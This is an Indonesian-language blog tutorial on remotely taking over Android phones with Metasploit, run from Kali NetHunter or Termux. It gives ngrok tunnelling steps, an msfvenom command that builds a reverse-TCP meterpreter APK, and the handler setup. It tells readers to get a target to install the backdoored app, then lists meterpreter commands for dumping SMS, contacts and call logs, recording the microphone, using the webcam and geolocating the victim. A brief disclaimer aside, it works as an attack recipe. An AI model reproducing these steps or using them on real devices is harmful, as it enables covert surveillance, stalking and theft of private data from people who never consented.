Cara Exploit/Hack Android Beda Jaringan dengan Metasploit Termux/Linux/Windows

1 Like comments off


Exploit android adalah teknik hacking yang dilakukan untuk mengambil informasi dari perangkat target dengan cara menaruh file backdoor di perangkat target. Dengan cara exploit android ini ada banyak hal yang bisa dilakukan, misalnya saja membaca pesan,file dan juga bisa mengakses kamera maupun microphone target.

Kali ini kita akan belajar untuk exploitasi perangkat android di beda jaringan dan jarak jauh. Sebelumnya saya membuat artikel ini tujuan nya agar kita semua bisa lebih berhati- hati dengan teknik hacking ini, ini sebagai pembelajaran dan sebaiknya jangan disalahgunakan. Segala bentuk pelanggaran dengan teknik ini setelah anda membaca tutorial saya ini, diluar tanggung jawab penulis. Semua kejahatan di dunia digital akan meninggalkan jejak, cepat atau lambat pasti akan dimintai pertanggung jawaban.
Kita akan menjalankan dengan dua cara dari kalinethunter dan termux. Hal ini supaya mudah dipraktekkan oleh teman-teman pembaca karena dengan termux dan kalinethunter ini menurut droidcyber.com merupakan cara termudah dan dapat dioperasikan di smartphone.

Alat dan bahan untuk Exploit /Hack Android Beda Jaringan dengan Kalinethunter dan Termux

Android.

Akan lebih baik jika menggunakan android root. Dan kalau bisa menggunakan kalinethunter, kalinethunter merupakan kalilinux versi ponsel dan sudah dilengkapi dengan banyak tool penetrasi jaringan termasuk tools exploit. Kalau anda mau menginstall kalinethunter di android silahkan baca tutorial saya tentang
Kalau anda menggunakan termux juga bisa, karena termux berbasis command line dan bisa menjalankan hampir semua perintah di linux. Untuk termux bisa di download dibawah ini dan bisa berjalan tanpa akses root.

Metasploit.

Metasploit adalah sebuah aplikasi maupun framwork yang berfungsi untuk engeksploitasi jaringan dalam hacking maupun IT dan tools ini banyak digunakan oleh orang -orang IT pemula maupun profesional. Metasploit akan menghasilkan file meterpreter yang bisa dioperasikan dengan satu jaringan maupun beda jaringan sehingga akses control ke perangkat target menjadi lebih mudah.
Metasploit dapat diinstall di linux atau distro turunanya,android dan windows. 
Sebelum ke langkah penginstalan dan cara menggunakan metasploit nya,kita harus tau dulu perintah apa saja yang ada di metasploit.
Berikut perintah metasploit dalam bahasa inggris, gunakan google translete untuk mengetahui fungsinya ya, nanti dibawah saya akan kasih tahu fungsi -fungsi pokoknya saja.

Kumpulan perintah / command Metasploit

Core Commands
=============

Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
tip Show a useful productivity tip
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers


Module Commands
===============

Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
clearm Clear the module stack
info Displays information about one or more modules
listm List the module stack
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Interact with a module by name or search term/index


Job Commands
============

Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job


Resource Script Commands
========================

Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file


Database Backend Commands
=========================

Command Description
------- -----------
analyze Analyze database information about a specific address or address range
db_connect Connect to an existing data service
db_disconnect Disconnect from the current data service
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache (deprecated)
db_remove Remove the saved data service entry
db_save Save the current data service connection as the default to reconnect on startup
db_status Show the current data service status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces


Credentials Backend Commands
============================

Command Description
------- -----------
creds List all credentials in the database


Developer Commands
==================

Command Description
------- -----------
edit Edit the current module or a file with the preferred editor
irb Open an interactive Ruby shell in the current context
log Display framework.log paged to the end if possible
pry Open the Pry debugger on the current module or Framework
reload_lib Reload Ruby library files from specified paths
msfconsole
==========

`msfconsole` is the primary interface to Metasploit Framework. There is quite a
lot that needs go here, please be patient and keep an eye on this space!

Building ranges and lists
-------------------------

Many commands and options that take a list of things can use ranges to avoid
having to manually list each desired thing. All ranges are inclusive.

### Ranges of IDs

Commands that take a list of IDs can use ranges to help. Individual IDs must be
separated by a `,` (no space allowed) and ranges can be expressed with either
`-` or `..`.

### Ranges of IPs

There are several ways to specify ranges of IP addresses that can be mixed
together. The first way is a list of IPs separated by just a ` ` (ASCII space),
with an optional `,`. The next way is two complete IP addresses in the form of
`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
specifications may also be used, however the whole address must be given to
Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
Additionally, a netmask can be used in conjunction with a domain name to
dynamically resolve which block to target. All these methods work for both IPv4
and IPv6 addresses. IPv4 addresses can also be specified with special octet
ranges from the [NMAP target
specification](https://nmap.org/book/man-target-specification.html)

### Examples

Terminate the first sessions:

sessions -k 1

Stop some extra running jobs:

jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

set RHOSTS www.example.test/24
Itu masih command di menu msfconsole, di menu meterpreter nanti akan ada lagi command khusus di setiap perangkat yang di akses.
Selanjutnya ke tahap penginstalan metasploit. Mari kita bahas satu persatu cara penginstalan metasploit untuk linux , windows dan android.

Cara install dan Cara Menggunakan Metasploit di linux (Kalinethunter) dan varian linux lainya maupun termux android

Metasploit sendiri kalau di kalinethunter sudah ada paketnya sejak penginstalan kalinethunter itu sendiri. Untuk menggunakan metasploit di kalinethunter bisa membuka terminal dan ketik msfconsole. kalinethunter merupakan kalilinux versi smartphone yang sudah ada paket tools security pentesting nya.
Untuk penginstalan di linux lain bisa menggunakan command dibawah ini.
Cara install metasploit di kalilinux 
Kalilinux versi minimal chroot tentu belum lengkap paket nya,

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
Untuk menggunakan nya saya coba menggunakan kalinethunter.

Ngrok

Kalau untuk satu jaringan kita tidak membutuhkan ngrok, untuk beda jaringan agar file backdor terkoneksi dengan server di linux yang dibuat maka perlu adanya ngrok. Untuk cara menginstall dan menggunakan ngrok silahkan baca dulu tutorial cara menginstall dan menggunakan ngrok.
Setelah bahan-bahan nya komplit, langsung kita kelangkah exploitasi android jarak jauh.
Pertama kita harus buat aplikasi backdoor nya dulu.

Cara membuat aplikasi backdoor di kalinet hunter dan termux dengan metasploit.

Jalankan ngrok dengan perintah 
./ngrok tcp 8080
Nanti akan ada forwarding, lihat dan salin. Biasanya tcp://0.tcp.ngrok.io :port
Catat port nya, buka window baru dan ketik perintah

nslookup
Kemudian paste alamat forwarding di ngrok tadi dan convert ke ip address. Catat ip nya.
Kalau di kalinethunter langsung buka aplikasi nethunter dan pilih metasploit payload generator.

Isi port dan ip sesuai yang didapat dari ngrok tadi. Lalu generate to sd card.
Buka file manager dan bagikan aplikasinya dan suruh target untuk menginstalll nya.
Kemudian buka terminal lagi dan ketik
msfconsole
Ketik perintah

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 8080
exploit
Kalau sudah ada tulisan meterpreter>
Berarti metasploit sudah bisa terhubung dengan file backdoor yang tadi dibuat.
Sekarang tinggal exploitasi android target dengan berbagai command dipaling bawah artikel ini. Sesuaikan dengan sistem yang di exploit.
Untuk exploitasi dengan termux, cara dan perintah nya hampir sama cuma untuk pembuatan aplikasi backdoor nya dengan perintah dibawah ini.
/sdcard

msfvenom -p android/meterpreter/reverse_tcp LHOST=(ip ngrok) LPORT= (port ngrok) R >NAMA APP.APK
Nama app terserah anda, untuk perintah metasploitnya sama saja. Sedang kan penginstalan metasploit ditermux bisa dilihat disini.

KUMPULAN PERINTAH METERPRETER METASPLOIT


Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel


Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory


Stdapi: Networking Commands
===========================

Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table


Stdapi: System Commands
=======================

Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
localtime Displays the target system's local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

Command Description
------- -----------
screenshare Watch the remote user's desktop in real time
screenshot Grab a screenshot of the interactive desktop


Stdapi: Webcam Commands
=======================

Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

Command Description
------- -----------
play play a waveform audio file (.wav) on the target system


Android Commands
================

Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
hide_app_icon Hide the app icon from the launcher
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan_geolocate Get current lat-long using WLAN information


Application Controller Commands
===============================

Command Description
------- -----------
app_install Request to install apk file
app_list List installed apps in the device
app_run Start Main Activty for package name
app_uninstall Request to uninstall application

You might like

About the Author: mrmixo

Terinspirasi untuk menjadi detektif, menelusuri betapa rumitnya dirimu